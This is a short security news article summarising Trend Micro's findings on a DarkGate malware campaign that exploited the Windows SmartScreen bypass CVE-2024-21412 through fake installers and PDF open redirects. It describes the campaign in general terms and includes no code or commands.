Trend Micro analysts have uncovered a sophisticated DarkGate malware campaign, which has been exploiting a recent Windows SmartScreen vulnerability as a zero-day to distribute malware since mid-January 2024.

Tracked as CVE-2024-21412, zero-day is a Microsoft Defender SmartScreen bypass vulnerability. The issue exists due to improper input validation when handling Internet shortcut files. A remote attacker can trick the victim into clicking on a specially crafted shortcut file and executing arbitrary code on the system. The flaw was fixed as part of Microsoft’s February 2024 Patch Tuesday updates.

Trend Micro reported back in February that CVE-2024-21412 was exploited as part of a sophisticated zero-day attack chain by a threat actor tracked as Water Hydra (aka DarkCasino) that targeted financial market traders. Now the company has released a more detailed technical write-up on the campaign.

The DarkGate campaign utilized a multi-pronged approach to target victims, with the primary method involving the exploitation of CVE-2024-21412 via fake software installers. These installers, disguised as legitimate applications such as Apple iTunes, Notion, and NVIDIA software, contained a sideloaded DLL file that decrypted and infected users with the DarkGate malware.

One of the notable aspects of this campaign is the use of PDFs containing Google DoubleClick Digital Marketing (DDM) open redirects. These redirects led users to compromised sites hosting the Microsoft Windows SmartScreen bypass exploit, ultimately leading to the download of malicious .MSI installers.

DarkGate, operating on a malware-as-a-service (MaaS) model, is a popular tool among financially motivated threat actors across the globe. The malware was used by cybercriminals to target organizations in North America, Europe, Asia, and Africa.